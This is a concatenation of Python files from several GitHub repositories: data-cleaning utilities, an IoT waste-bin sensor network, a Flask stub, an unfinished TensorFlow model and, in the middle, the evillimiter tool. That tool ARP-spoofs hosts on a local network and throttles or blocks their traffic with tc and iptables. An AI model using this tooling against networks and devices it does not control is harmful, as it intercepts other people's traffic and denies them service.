{
"source": "A1Liu/boundio",
"score": 2
}
#### File: boundio/examples/stdin_simple.py
```python
from boundio.examples.utils import get_example_code
source = get_example_code(__file__)
from boundio.stdin import stdin_stream
import boundio as bio
@bio.task() # Add task to task list
async def basic_echo():
    async for line in stdin_stream():
        line = line[:-1]  # strip the trailing newline
        if line == 'quit':
            break
        print(line)
if __name__ == '__main__':
bio.run_tasks()
else:
bio.clear_tasks()
```
#### File: boundio/examples/utils.py
```python
import re
# Matches everything up to and including the first blank line.
beginning = re.compile(r'^[\s\S]+?\n\n')
def get_example_code(path):  # Strip the header section that fetches this example's own source.
with open(path,'r') as f:
txt = f.read()
return beginning.sub('',txt)
```
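A quick illustration (not part of the repository) of what the `beginning` pattern removes: the non-greedy match consumes everything up to and including the first blank line, which is where each example's self-referencing header ends.
```python
import re
beginning = re.compile(r'^[\s\S]+?\n\n')
header_and_body = (
    "from boundio.examples.utils import get_example_code\n"
    "source = get_example_code(__file__)\n"
    "\n"
    "print('actual example code')\n"
)
# Everything before the first blank line is stripped away.
print(beginning.sub('', header_and_body))  # -> "print('actual example code')\n"
```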
#### File: boundio/boundio/item_codes.py
```python
class ITEM_CODE():
def __init__( self,name ):
self.name = name
def __str__(self):
return ''
# Go to on_close
class CLOSE_STREAM(ITEM_CODE):
    def __init__(self, frame):
        super().__init__("boundio.item_codes.CLOSE_STREAM")
self.frame = frame
def __str__(self):
return str(self.frame)
# Don't yield this item
SKIP_ITEM = ITEM_CODE("boundio.item_codes.SKIP_ITEM")
# Directly return
END_IO = CLOSE_STREAM('')
END_IO.name = "boundio.item_codes.END_IO"
```
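A hypothetical consumer loop (not from the repository) showing how these sentinels are meant to be used: they are compared by identity, since `__str__` alone cannot distinguish them.
```python
def consume(items):
    for item in items:
        if item is SKIP_ITEM:
            continue   # don't yield this item
        if item is END_IO:
            break      # directly return
        if isinstance(item, CLOSE_STREAM):
            print("closing with frame:", str(item))
            break
        print(item)

consume(["a", SKIP_ITEM, "b", END_IO])  # prints "a" then "b"
```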
#### File: boundio/sockets/utils.py
```python
import websockets
# Put each frame on its own line for easier downstream processing
def process_frame(socket, frame):
    return "{}\n".format(frame.strip().replace('\n', ''))
```
{
"source": "A1Liu/pytill",
"score": 2
}
#### File: aliu/debug/__init__.py
```python
from aliu.debug.placeholder import Placeholder
from aliu.debug.debug import *
def add_placeholder(obj, attribute):
    """Swap out an attribute for a Placeholder and return a restorer.
    Usage:
        remove_placeholder = add_placeholder(my_object, 'my_object_attribute')
        # Do something with the object
        remove_placeholder()
    """
origin = getattr(obj, attribute)
placeholder = Placeholder(origin)
setattr(obj, attribute, placeholder)
return lambda: setattr(obj, attribute, origin)
```
#### File: utils/data/count_entries.py
```python
import pandas as pd
def count_entries(df, col_name):
    """Return a dictionary mapping each unique value
    in `col_name` to its number of occurrences."""
    counts = {}
    for entry in df[col_name]:
        counts[entry] = counts.get(entry, 0) + 1
    return counts
def count_entries_csv(csv_file, col_name, chunksize=10):
    """Like count_entries, but reads the CSV in chunks
    so that arbitrarily large files fit in memory."""
    counts = {}
    for chunk in pd.read_csv(csv_file, chunksize=chunksize):
        # Accumulate per-chunk counts; dict.update() would
        # overwrite totals from earlier chunks.
        for key, value in count_entries(chunk, col_name).items():
            counts[key] = counts.get(key, 0) + value
    return counts
```
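A minimal usage check for `count_entries` (illustrative, not in the repository):
```python
import pandas as pd

df = pd.DataFrame({'lang': ['python', 'go', 'python', 'rust']})
print(count_entries(df, 'lang'))  # {'python': 2, 'go': 1, 'rust': 1}
```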
#### File: data/mr_clean0/mr_clean_func_utils.py
```python
import numpy as np
import pandas as pd
def coerce(df, column, values):
    df[column] = values
def row_req(df, cutoff):
    return rows(df) * cutoff
def rows(df):
    return df.shape[0]
def is_num(series):
    return series.dtype in (np.float64, np.int64)
def get_cutoff(column, cutoff):
    return __value_or_container(column, cutoff, 1)
def get_colname_gen(df):
def colname_gen(col_name = 'mrClean'):
assert type(df) is pd.DataFrame
id_string = col_name
if id_string not in df.keys():
yield id_string
id_number = 0
while True:
id_string = col_name + str(id_number)
if id_string in df.keys():
id_number+=1
else:
yield id_string
return colname_gen
def bc_vec(df, value=True):  # Boolean column vector
    return np.ones(rows(df), dtype=bool) if value else np.zeros(rows(df), dtype=bool)
def ic_vec(df, value=0):  # Integer column vector
if value == 0:
return np.zeros(rows(df),dtype=np.int32)
elif value == 1:
return np.ones(rows(df),dtype=np.int32)
else:
return np.ones(rows(df),dtype=np.int32) * value
def __value_or_container(key,item,default):
if type(item) is dict:
return item[key] if key in item else default
return item
```
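A sketch (illustrative) of how the generator from `get_colname_gen` skips column names that already exist:
```python
import pandas as pd

df = pd.DataFrame({'mrClean': [1], 'mrClean0': [2]})
gen = get_colname_gen(df)()
# 'mrClean' and 'mrClean0' are taken, so the first free name is yielded:
print(next(gen))  # 'mrClean1'
```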
#### File: data/mr_clean0/mr_clean_print_utils.py
```python
import shutil
# Simple statement of memory usage
def memory_statement(savings,task_name,statement):
return statement \
.format( convert_memory(savings) ,task_name )
# Convert a memory value in bytes to a human-readable form
def convert_memory(memory_value):
unit_list = ['KB','MB','GB','TB']
index = 0
memory = memory_value / 1024
while memory > 1000 and index < 3:
memory/=1024
index+=1
return '{} {}'.format(round( memory, 1),unit_list[index])
def title_line(text):
"""Returns a string that represents the
text as a title blurb
"""
columns = shutil.get_terminal_size()[0]
start = columns // 2 - len(text) // 2
output = '='*columns + '\n\n' + \
' ' * start + str(text) + "\n\n" + \
'='*columns + '\n'
return output
# Writes the frame to a file. Overwrites an existing file only when output_safe is False.
def output_to_file(df, output_file, output_safe):
    try:
        with open(output_file, 'x' if output_safe else 'w') as file:
            file.write(df.to_csv(index=False))  # file.write() needs a string, not a DataFrame
    except FileExistsError:
        print("Nothing written: file '{}' already exists".format(output_file))
```
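`convert_memory` assumes a byte count and climbs the unit list one division at a time; a few illustrative values:
```python
print(convert_memory(2048))           # '2.0 KB'
print(convert_memory(5 * 1024 ** 2))  # '5.0 MB'
print(convert_memory(3 * 1024 ** 4))  # '3.0 TB'
```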
#### File: data/mr_clean0/mr_clean.py
```python
from mr_clean_functions import coerce_col,preview,remove_whitespace, \
rename_cols,rename_index,scrub_str_cols,validate
from mr_clean_print_utils import convert_memory,memory_statement,output_to_file,title_line
# Takes a DataFrame plus a handful of tuning parameters and returns a
# cleaned DataFrame. It operates under a few basic assumptions,
# so it can't handle everything.
def clean(df, settings = None, col_names = None,handle_na = None,
char_scrub = True, char_scrub_cutoff = .99, scrub_ignore = [],
numeric_cutoff = .95, coerce_numeric = [],
dt_cutoff = .99, coerce_dt = [], dt_format = None,
categorical_cutoff = .60,coerce_categorical = [],
display_preview = True, preview_rows = 5, preview_max_cols = 0,
output_file = None,output_safe = True):
# Error Trap inputs
validate(df,coerce_numeric,coerce_dt,coerce_categorical)
def memory_change(task_name = None): # Returns a memory statement and resets memory
nonlocal df_memory, df
savings = df_memory - reset_mem()
if task_name is not None:
if savings > 0:
return memory_statement(savings,task_name,'Saved {} after {}\n')
else:
return memory_statement(-savings,task_name,"Size grew by {} after {}\n")
def memory(column = None):# Returns the memory of the dataframe
nonlocal df
if column is None:
return df.memory_usage(deep=True)
else:
return df[column].memory_usage(deep=True)
def reset_mem():# Resets memory value
nonlocal df_memory
df_memory = memory().sum()
return df_memory
# Make a copy of the inputted DataFrame
old_df = df
df = df.copy()
begin_df_memory = memory().sum()
df_memory = begin_df_memory
    # ------TODO:   Remove unused columns----
    # ------TASK 1: CHANGE COLNAMES----------
print('Renaming columns...')
rename_cols(df,col_names)
# ------TASK 2: REMOVE WHITESPACE--------
print('Checking for extra whitespace...')
col_mem = memory()
for savings,column in ((col_mem[column]-memory(column),column)
for column in remove_whitespace(df) if col_mem[column]-memory(column) > 0):
print( memory_statement(savings,
"removing extra whitespace from column '{}'" \
.format(column)))
print(memory_change('removing whitespace'))
# ------TASK 3: REFORMAT INDEX-----------
if rename_index(df):
print('Changing unhelpful index and adding it as column')
print(memory_change('adding a column'))
# Try to remove characters from beginning and end of columns
    # ------TASK 4: DEEP CLEAN---------------
if char_scrub:
print('Trying character scrub...')
for result in ( scrub_str_cols( df,column, char_scrub_cutoff )
for column in df if column not in scrub_ignore ):
print( ("Scrubbed '{}' from the front and '{}' from the back of column '{}', \n\t" \
"and stored the scrub depths to columns '{}' and '{}' respectively.") \
.format(*result)) if result is not None else None
print(memory_change('character scrubbing'))
    # ------TASK 5: Coerce data types--------
col_mem = memory()
print('Trying to coerce column values...')
for column in df:
if coerce_col(df,column,
numeric_cutoff, coerce_numeric,
dt_cutoff, coerce_dt, dt_format,
categorical_cutoff,coerce_categorical):
print( memory_statement( col_mem[column]-memory(column),
"coercing column '{}' to dtype '{}'" \
.format(column,df[column].dtype) ) )
print(memory_change('coercing columns to specialized data-types'))
    # ------FUTURE TASKS---------------------
    # - Combine columns that are correlated
    #   (lossless 'compression' and lossy 'compression')
    # - Fill in / handle missing values
    # - Do melts and pivots (if necessary). I'll do this when I have a better
    #   grasp of the intuition that's used to determine when a pivot or melt
    #   is necessary. For now this is just a comment (and a dream).
# Print what was done
print(title_line('SUMMARY'))
# Compare column names
print("Comparison of Column Names: \n\n{}\n{}\n\n".format(old_df.columns,df.columns))
# Compare column data types
    # Compare previews of data
if display_preview:
print('Visual Comparison of DataFrames:\n')
print(preview(old_df,preview_rows, preview_max_cols))
print()
print(preview(df,preview_rows, preview_max_cols))
print('\n')
print('Memory Usage:\n')
print('Initial data size in memory: {}'.format( convert_memory(begin_df_memory) ))
print(' Final data size in memory: {}'.format( convert_memory(memory().sum()) ))
print(' Change: {}'.format( convert_memory(memory().sum()-begin_df_memory) ))
if output_file is None:
return df
else:
output_to_file(df,output_file, output_safe)
```
#### File: utils/io/Format.py
```python
def isNumber(number):
    if isinstance(number, float):
        return True
    try:
        float(number)
        return True
    except (TypeError, ValueError):
        return False
```
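A few illustrative checks for `isNumber`:
```python
print(isNumber(3.14))   # True  (float instance, fast path)
print(isNumber('42'))   # True  (parses as a float)
print(isNumber('abc'))  # False
```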
{
"source": "A1manac/evillimiter",
"score": 2
}
#### File: evillimiter/menus/main_menu.py
```python
import socket
import netaddr
import collections
from terminaltables import SingleTable
import evillimiter.networking.utils as netutils
from .menu import CommandMenu
from evillimiter.console.io import IO
from evillimiter.console.banner import get_main_banner
from evillimiter.networking.host import Host
from evillimiter.networking.limiter import Limiter
from evillimiter.networking.spoof import ARPSpoofer
from evillimiter.networking.scan import HostScanner
class MainMenu(CommandMenu):
def __init__(self, version, interface, gateway_ip, gateway_mac, netmask):
super().__init__()
self.prompt = '({}Main{}) >>> '.format(IO.Style.BRIGHT, IO.Style.RESET_ALL)
self.parser.add_subparser('hosts', self._hosts_handler)
self.parser.add_subparser('clear', self._clear_handler)
scan_parser = self.parser.add_subparser('scan', self._scan_handler)
scan_parser.add_parameterized_flag('--range', 'iprange')
limit_parser = self.parser.add_subparser('limit', self._limit_handler)
limit_parser.add_parameter('id')
limit_parser.add_parameter('rate')
block_parser = self.parser.add_subparser('block', self._block_handler)
block_parser.add_parameter('id')
free_parser = self.parser.add_subparser('free', self._free_handler)
free_parser.add_parameter('id')
add_parser = self.parser.add_subparser('add', self._add_handler)
add_parser.add_parameter('ip')
add_parser.add_parameterized_flag('--mac', 'mac')
self.parser.add_subparser('help', self._help_handler)
self.parser.add_subparser('?', self._help_handler)
self.parser.add_subparser('quit', self._quit_handler)
self.parser.add_subparser('exit', self._quit_handler)
self.version = version # application version
self.interface = interface # specified IPv4 interface
self.gateway_ip = gateway_ip
self.gateway_mac = gateway_mac
self.netmask = netmask
# range of IP address calculated from gateway IP and netmask
self.iprange = list(netaddr.IPNetwork('{}/{}'.format(self.gateway_ip, self.netmask)))
self.host_scanner = HostScanner(self.interface, self.iprange)
self.arp_spoofer = ARPSpoofer(self.interface, self.gateway_ip, self.gateway_mac)
self.limiter = Limiter(self.interface)
# holds discovered hosts
self.hosts = []
self._print_help_reminder()
# start the spoof thread
self.arp_spoofer.start()
def interrupt_handler(self, ctrl_c=True):
if ctrl_c:
IO.spacer()
IO.ok('cleaning up... stand by...')
self.arp_spoofer.stop()
for host in self.hosts:
self._free_host(host)
def _scan_handler(self, args):
"""
Handles 'scan' command-line argument
(Re)scans for hosts on the network
"""
if args.iprange:
try:
if '-' in args.iprange:
iprange = list(netaddr.iter_iprange(*args.iprange.split('-')))
else:
iprange = list(netaddr.IPNetwork(args.iprange))
except netaddr.core.AddrFormatError:
IO.error('ip range invalid.')
return
else:
iprange = None
for host in self.hosts:
self._free_host(host)
IO.spacer()
self.hosts = self.host_scanner.scan(iprange)
IO.ok('{}{}{} hosts discovered.'.format(IO.Fore.LIGHTYELLOW_EX, len(self.hosts), IO.Style.RESET_ALL))
IO.spacer()
def _hosts_handler(self, args):
"""
Handles 'hosts' command-line argument
Displays discovered hosts
"""
table_data = [[
'{}ID{}'.format(IO.Style.BRIGHT, IO.Style.RESET_ALL),
'{}IP-Address{}'.format(IO.Style.BRIGHT, IO.Style.RESET_ALL),
'{}MAC-Address{}'.format(IO.Style.BRIGHT, IO.Style.RESET_ALL),
'{}Hostname{}'.format(IO.Style.BRIGHT, IO.Style.RESET_ALL),
'{}Status{}'.format(IO.Style.BRIGHT, IO.Style.RESET_ALL)
]]
for i, host in enumerate(self.hosts):
table_data.append([
'{}{}{}'.format(IO.Fore.LIGHTYELLOW_EX, i, IO.Style.RESET_ALL),
host.ip,
host.mac,
host.name if host.name is not None else '',
host.pretty_status()
])
table = SingleTable(table_data, 'Hosts')
if not table.ok:
IO.error('table does not fit terminal. resize or decrease font size.')
return
IO.spacer()
IO.print(table.table)
IO.spacer()
def _limit_handler(self, args):
"""
Handles 'limit' command-line argument
        Limits bandwidth of host to specified rate
"""
        hosts = self._get_hosts_by_ids(args.id)
        rate = args.rate
        # validate the rate once, before any host is spoofed
        if not netutils.validate_netrate_string(rate):
            IO.error('limit rate is invalid.')
            return
        if hosts is not None and len(hosts) > 0:
            for host in hosts:
                if not host.spoofed:
                    self.arp_spoofer.add(host)
                self.limiter.limit(host, rate)
                IO.ok('{}{}{} limited{} to {}.'.format(IO.Fore.LIGHTYELLOW_EX, host.ip, IO.Fore.LIGHTRED_EX, IO.Style.RESET_ALL, rate))
def _block_handler(self, args):
"""
Handles 'block' command-line argument
Blocks internet communication for host
"""
hosts = self._get_hosts_by_ids(args.id)
if hosts is not None and len(hosts) > 0:
for host in hosts:
if not host.spoofed:
self.arp_spoofer.add(host)
self.limiter.block(host)
IO.ok('{}{}{} blocked{}.'.format(IO.Fore.LIGHTYELLOW_EX, host.ip, IO.Fore.RED, IO.Style.RESET_ALL))
def _free_handler(self, args):
"""
Handles 'free' command-line argument
Frees the host from all limitations
"""
hosts = self._get_hosts_by_ids(args.id)
if hosts is not None and len(hosts) > 0:
for host in hosts:
self._free_host(host)
def _add_handler(self, args):
"""
Handles 'add' command-line argument
Adds custom host to host list
"""
ip = args.ip
if not netutils.validate_ip_address(ip):
IO.error('invalid ip address.')
return
if args.mac:
mac = args.mac
if not netutils.validate_mac_address(mac):
IO.error('invalid mac address.')
return
else:
mac = netutils.get_mac_by_ip(self.interface, ip)
if mac is None:
IO.error('unable to resolve mac address. specify manually (--mac).')
return
name = None
try:
host_info = socket.gethostbyaddr(ip)
name = None if host_info is None else host_info[0]
except socket.herror:
pass
host = Host(ip, mac, name)
if host in self.hosts:
            IO.error('host already exists.')
return
self.hosts.append(host)
IO.ok('host added.')
def _clear_handler(self, args):
"""
Handler for the 'clear' command-line argument
Clears the terminal window and re-prints the banner
"""
IO.clear()
IO.print(get_main_banner(self.version))
self._print_help_reminder()
def _help_handler(self, args):
"""
Handles 'help' command-line argument
Prints help message including commands and usage
"""
spaces = ' ' * 30
IO.print(
"""
{y}scan (--range [IP range]){r}{}scans for online hosts on your network.
{s}required to find the hosts you want to limit.
{b}{s}e.g.: scan
{s} scan --range 192.168.178.1-192.168.178.50
{s} scan --range 192.168.178.1/24{r}
{y}hosts{r}{}lists all scanned hosts.
{s}contains host information, including IDs.
        {y}limit [ID1,ID2,...] [rate]{r}{}limits bandwidth of host(s) (upload/download).
{b}{s}e.g.: limit 4 100kbit
{s} limit 2,3,4 1gbit
{s} limit all 200kbit{r}
{y}block [ID1,ID2,...]{r}{}blocks internet access of host(s).
{b}{s}e.g.: block 3,2
{s} block all{r}
{y}free [ID1,ID2,...]{r}{}unlimits/unblocks host(s).
{b}{s}e.g.: free 3
{s} free all{r}
{y}add [IP] (--mac [MAC]){r}{}adds custom host to host list.
{s}mac resolved automatically.
{b}{s}e.g.: add 192.168.178.24
{s} add 192.168.1.50 --mac 1c:fc:bc:2d:a6:37{r}
{y}clear{r}{}clears the terminal window.
{y}quit{r}{}quits the application.
""".format(
spaces[len('scan (--range [IP range])'):],
spaces[len('hosts'):],
spaces[len('limit [ID1,ID2,...] [rate]'):],
spaces[len('block [ID1,ID2,...]'):],
spaces[len('free [ID1,ID2,...]'):],
spaces[len('add [IP] (--mac [MAC])'):],
spaces[len('clear'):],
spaces[len('quit'):],
y=IO.Fore.LIGHTYELLOW_EX, r=IO.Style.RESET_ALL, b=IO.Style.BRIGHT,
s=spaces
)
)
def _quit_handler(self, args):
self.interrupt_handler(False)
self.stop()
def _print_help_reminder(self):
IO.print('type {Y}help{R} or {Y}?{R} to show command information.'.format(Y=IO.Fore.LIGHTYELLOW_EX, R=IO.Style.RESET_ALL))
def _get_hosts_by_ids(self, ids_string):
if ids_string == 'all':
return self.hosts.copy()
try:
ids = [int(x) for x in ids_string.split(',')]
except ValueError:
IO.error('\'{}\' are invalid IDs.'.format(ids_string))
return
hosts = []
for id_ in ids:
if len(self.hosts) == 0 or id_ not in range(len(self.hosts)):
IO.error('no host with id {}{}{}.'.format(IO.Fore.LIGHTYELLOW_EX, id_, IO.Style.RESET_ALL))
return
if self.hosts[id_] not in hosts:
hosts.append(self.hosts[id_])
return hosts
def _free_host(self, host):
"""
Stops ARP spoofing and unlimits host
"""
if host.spoofed:
self.arp_spoofer.remove(host)
self.limiter.unlimit(host)
IO.ok('{}{}{} freed.'.format(IO.Fore.LIGHTYELLOW_EX, host.ip, IO.Style.RESET_ALL))
```
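A standalone sketch (not from the repository) of the column-alignment trick `_help_handler` relies on: a fixed run of spaces is sliced by each command's length, so every description starts at the same column.
```python
spaces = ' ' * 30
commands = [
    ('scan', 'scans for online hosts on your network.'),
    ('limit [ID1,ID2,...] [rate]', 'limits bandwidth of host(s).'),
]
for name, description in commands:
    # pad each command out to column 30, then print its description
    print(name + spaces[len(name):] + description)
```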
#### File: evillimiter/networking/limiter.py
```python
import evillimiter.console.shell as shell
from .host import Host
from evillimiter.common.globals import BIN_TC, BIN_IPTABLES
class Limiter(object):
def __init__(self, interface):
self.interface = interface
        # maps an ID to each host to distinguish between the forwarded packets
self.host_id_map = {}
def limit(self, host: Host, rate):
"""
Limits the uload/dload traffic of a host
to a specified rate
"""
id_ = self._create_id()
if host in self.host_id_map:
id_ = self.host_id_map[host]
self.unlimit(host)
# add a class to the root qdisc with specified rate
shell.execute_suppressed('{} class add dev {} parent 1:0 classid 1:{} htb rate {r} ceil {r}'.format(BIN_TC, self.interface, id_, r=rate))
# add a fw filter that filters packets marked with the corresponding ID
shell.execute_suppressed('{} filter add dev {} parent 1:0 protocol ip prio {id} handle {id} fw flowid 1:{id}'.format(BIN_TC, self.interface, id=id_))
# marks outgoing packets
shell.execute_suppressed('{} -t mangle -A POSTROUTING -s {} -j MARK --set-mark {}'.format(BIN_IPTABLES, host.ip, id_))
# marks incoming packets
shell.execute_suppressed('{} -t mangle -A PREROUTING -d {} -j MARK --set-mark {}'.format(BIN_IPTABLES, host.ip, id_))
self.host_id_map[host] = id_
host.limited = True
def block(self, host):
id_ = self._create_id()
if host in self.host_id_map:
id_ = self.host_id_map[host]
self.unlimit(host)
# drops forwarded packets with matching source
shell.execute_suppressed('{} -t filter -A FORWARD -s {} -j DROP'.format(BIN_IPTABLES, host.ip))
# drops forwarded packets with matching destination
shell.execute_suppressed('{} -t filter -A FORWARD -d {} -j DROP'.format(BIN_IPTABLES, host.ip))
self.host_id_map[host] = id_
host.blocked = True
    def unlimit(self, host):
        if host not in self.host_id_map:
            return  # nothing to tear down for a host that was never limited or blocked
        id_ = self.host_id_map[host]
        self._delete_tc_class(id_)
        self._delete_iptables_entries(host, id_)
        del self.host_id_map[host]
        host.limited = False
        host.blocked = False
def _create_id(self):
"""
Returns a unique ID that is
currently not in use
"""
id_ = 1
while True:
if id_ not in self.host_id_map.values():
return id_
id_ += 1
def _delete_tc_class(self, id_):
"""
Deletes the tc class and applied filters
for a given ID (host)
"""
shell.execute_suppressed('{} filter del dev {} parent 1:0 prio {}'.format(BIN_TC, self.interface, id_))
shell.execute_suppressed('{} class del dev {} parent 1:0 classid 1:{}'.format(BIN_TC, self.interface, id_))
def _delete_iptables_entries(self, host: Host, id_):
"""
Deletes iptables rules for a given ID (host)
"""
shell.execute_suppressed('{} -t mangle -D POSTROUTING -s {} -j MARK --set-mark {}'.format(BIN_IPTABLES, host.ip, id_))
shell.execute_suppressed('{} -t mangle -D PREROUTING -d {} -j MARK --set-mark {}'.format(BIN_IPTABLES, host.ip, id_))
shell.execute_suppressed('{} -t filter -D FORWARD -s {} -j DROP'.format(BIN_IPTABLES, host.ip))
shell.execute_suppressed('{} -t filter -D FORWARD -d {} -j DROP'.format(BIN_IPTABLES, host.ip))
```
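A dry-run sketch (not in the repository) that renders the shell commands `Limiter.limit` would execute, using the same format strings as above; `BIN_TC` and `BIN_IPTABLES` are assumed here to be the plain `tc` and `iptables` binaries.
```python
BIN_TC, BIN_IPTABLES = 'tc', 'iptables'
interface, ip, id_, rate = 'eth0', '10.0.0.5', 1, '100kbit'
# class + fw filter on the root qdisc, then mark packets in both directions
print('{} class add dev {} parent 1:0 classid 1:{} htb rate {r} ceil {r}'.format(BIN_TC, interface, id_, r=rate))
print('{} filter add dev {} parent 1:0 protocol ip prio {id} handle {id} fw flowid 1:{id}'.format(BIN_TC, interface, id=id_))
print('{} -t mangle -A POSTROUTING -s {} -j MARK --set-mark {}'.format(BIN_IPTABLES, ip, id_))
print('{} -t mangle -A PREROUTING -d {} -j MARK --set-mark {}'.format(BIN_IPTABLES, ip, id_))
```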
{
"source": "a1p4ca/slvn-cc",
"score": 2
}
#### File: a1p4ca/slvn-cc/app.py
```python
from flask import Flask, jsonify, request, render_template
from sds011 import SDS011
import os
import time
# dust_sensor = SDS011('COM7')
app = Flask(__name__)
# dust_sensor.sleep(sleep=False)
@app.route("/")
def main():
return render_template('index.html')
@app.route('/api', methods=['GET'])
def status():
# dust = dust_sensor.query()
dust = ['45', '59']
return jsonify({
'pm10': dust[0],
'pm25': dust[1]
})
if __name__ == '__main__':
app.run(debug=True)
```
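The stub endpoint can be exercised without a running server via Flask's built-in test client (illustrative):
```python
with app.test_client() as client:
    response = client.get('/api')
    print(response.get_json())  # {'pm10': '45', 'pm25': '59'}
```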
{
"source": "A1phaMark/Waste-Management-System",
"score": 3
}
#### File: A1phaMark/Waste-Management-System/head_node.py
```python
import socket
import sys
import time
# node file
server_address=('10.0.0.157', 8080) # head node address
sensor_address = [('10.0.0.22', 8080)] # a list of all sensor addresses
last_lev = 0
last_time = time.time()
############## update to the server####################################
def _update(pack):
try:
print("Sending update now...")
print("Trying to connect with TCP server...")
ts = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
ts.connect(("TCP server IP", 80))
ack = ts.recv(1024)
print("Connection with server success! Sending data now...")
print(ack.decode("utf-8"))
ts.send(pack.encode('utf-8'))
mess = ts.recv(1024)
print(mess.decode("utf-8"))
print("Data Transfer finished! Now go to sleep...")
ts.close()
return 1
    except OSError:
        print("Cannot connect to TCP server, go to sleep and wait for next data transfer...")
        return 0
############# make the packet ################################################################
def make_pack(data):
data = str(data)
device_name = 'id001' # represent trash can id
t = time.strftime('%Y-%m-%d %H:%M:%S')
pak = data + ', ' + device_name + ', ' + t
return pak
############ main ##############################################################
while 1:
data = 0
sensor_count = 0
    for addr in sensor_address:
        s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            s.bind(server_address)
            # send a request to the sensor
            message = '1'
            print("Trying to send to sensor", sensor_count + 1, "...")
            s.sendto(message.encode('utf-8'), addr)
            # receive the packet from the sensor
            reply = s.recvfrom(1024)
            print(reply)
            temp = reply[0]
            data += float(temp.decode('utf-8'))
            print("Received data from sensor, sending a reply...")
            # send a reply to inform the sensor that the packet was received
            message = '0'
            s.sendto(message.encode('utf-8'), addr)
            print("Reply sent")
            sensor_count += 1
        except OSError:
            print("An error occurred while trying to get data from sensor...")
        finally:
            s.close()  # release the address so the next iteration can bind it again
    print('')
print("Received data from all sensors, processing data now...")
try:
current_lev = data/sensor_count
# in our test, we made the interval much smaller
if current_lev < 0.5:
interval = 7200
elif current_lev >= 0.8:
interval = 1800
else:
interval = 3600
timer = time.time()
timer-= last_time
if timer >= interval:
#make the data packet
pack = make_pack(current_lev)
# Update to server complete
if _update(pack) == 1:
last_time = time.time() # reset timer
last_lev = current_lev # update last level
# update to server failed
else:
last_lev = current_lev
else:
change_lev = current_lev - last_lev
# check if the load changes a lot in a short period of time
if change_lev >= 0.25:
# make the data packet
pack = make_pack(current_lev)
if _update(pack) == 1:
last_time = time.time()
last_lev = current_lev
else:
last_lev = current_lev
else:
print("No need to send update now, go to sleep...")
last_lev = current_lev
    except Exception:
        print("Error occurred while processing the data")
print("----------------------------------------------------------------", '\n')
time.sleep(10)
```
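The packet format produced by `make_pack` is a plain comma-separated string, `<level>, <device id>, <timestamp>` (illustrative output; the timestamp varies):
```python
print(make_pack(0.62))  # e.g. '0.62, id001, 2023-06-01 12:30:00'
```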
#### File: A1phaMark/Waste-Management-System/sensor.py
```python
import time
import socket
import RPi.GPIO as GPIO
def perform_reading():
GPIO.setmode(GPIO.BCM)
TRIG = 23
ECHO = 24
GPIO.setup(TRIG, GPIO.OUT)
GPIO.setup(ECHO, GPIO.IN)
GPIO.output(TRIG, False)
time.sleep(2)
GPIO.output(TRIG, True)
time.sleep(.00001)
GPIO.output(TRIG, False)
    # record how long the ECHO pin stays high
    pulse_start = pulse_end = time.time()  # fallbacks in case a loop body never runs
    while GPIO.input(ECHO) == 0:
        pulse_start = time.time()
    while GPIO.input(ECHO) == 1:
        pulse_end = time.time()
    pulse_duration = pulse_end - pulse_start
# calculate distance by (time*velocity)/2
distance = pulse_duration * 17150
distance = round(distance, 2)
GPIO.cleanup()
print("distance recorded: " + str(distance))
current_lev = 1 - (distance/std_height)
current_lev = round(current_lev, 4)
return current_lev
BUFFER_SIZE = 1024
std_height = 80 #Length of trash bin in cm
address = ('10.0.0.22', 8080)
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
s.bind(address)
while 1:
try:
print("Waiting for packet...")
mess = s.recvfrom(1024)
print(mess)
send_addr = mess[1]
        # message = 1 means the head node is asking the sensor for a reading
        if mess[0].decode('utf-8') == '1':
            print("Received request from head node, it's time to perform a measurement!!")
            # perform a reading
            data = perform_reading()
data = str(data).encode('utf-8')
# send data to the head node
s.sendto(data, send_addr)
        # message = 0 means the head node has received the data
        if mess[0].decode('utf-8') == '0':
            print("Head node has received my data, it's time to sleep~~", '\n')
time.sleep(100)
    except OSError:
        time.sleep(100)
```
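The fill-level arithmetic in `perform_reading`, worked through for one reading (illustrative): an echo distance of 20 cm in an 80 cm bin means the bin is 75% full.
```python
std_height = 80   # length of the trash bin in cm
distance = 20.0   # measured distance from sensor to trash surface
print(round(1 - distance / std_height, 4))  # 0.75
```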
{
"source": "a1pha/mesa-cnn",
"score": 3
}
#### File: a1pha/mesa-cnn/model.py
```python
from __future__ import print_function
import tensorflow as tf
import numpy as np
from sklearn.model_selection import train_test_split
from sklearn.utils import shuffle
from data_processing import filter_activity, get_activity
import pickle
# Helper Method to Parse Mesa File Paths into Actigraphy Vectors
def process_input(key_np_array):
keys_processed = np.empty([key_np_array.size, 14400])
i = 0
for patient in key_np_array:
keys_processed[i] = filter_activity(get_activity(patient))
i += 1
return keys_processed
# Loading the data
with open('data_dict.pickle', 'rb') as read:
data_dict = pickle.load(read)
labels = (np.array(list(data_dict.values()))).astype(int)
unprocessed_input = np.array(list(data_dict.keys()))
# Splitting the data into training and test
X_train, X_test, y_train, y_test = train_test_split(unprocessed_input, labels, test_size=0.20, random_state=42)
# Converting labels to one-hot vectors
y_train = tf.keras.utils.to_categorical(y_train, num_classes=25)
y_test = tf.keras.utils.to_categorical(y_test, num_classes=25)
# Training Parameters
batch_size = 50
learning_rate = 0.01
epochs = 5
num_steps = X_train.size//batch_size
# Network Parameters
num_input = 14400
num_classes = 25
dropout = 0.75
# Create some wrappers for simplicity
def conv2d(x, W, b, strides=1):
x = tf.nn.conv2d(x, W, strides=[1, strides, strides, 1], padding='VALID')
x = tf.nn.bias_add(x, b)
return tf.nn.relu(x)
def conv1d(x, W, b, stride=1):
x = tf.nn.conv1d(x, W, stride=stride, padding='SAME')
x = tf.nn.bias_add(x, b)
return tf.nn.relu(x)
def maxpool1d(x, k=5):
return tf.nn.pool(x, [k], 'MAX', 'SAME', strides=[k])
# Store layers weight & bias
weights = {
    # 10-wide 1D conv, 1 input channel, 10 output channels
    'wc1': tf.Variable(tf.random_normal([10, 1, 10])),
    # 5x5 2D conv, 10 input channels, 20 output channels
    'wc2': tf.Variable(tf.random_normal([5, 5, 10, 20])),
    # fully connected, 115*20 = 2300 inputs, 1024 outputs
    'wd1': tf.Variable(tf.random_normal([2300, 1024])),
    # 1024 inputs, num_classes outputs (class prediction)
    'out': tf.Variable(tf.random_normal([1024, num_classes]))
}
biases = {
'bc1': tf.Variable(tf.random_normal([10])),
'bc2': tf.Variable(tf.random_normal([20])),
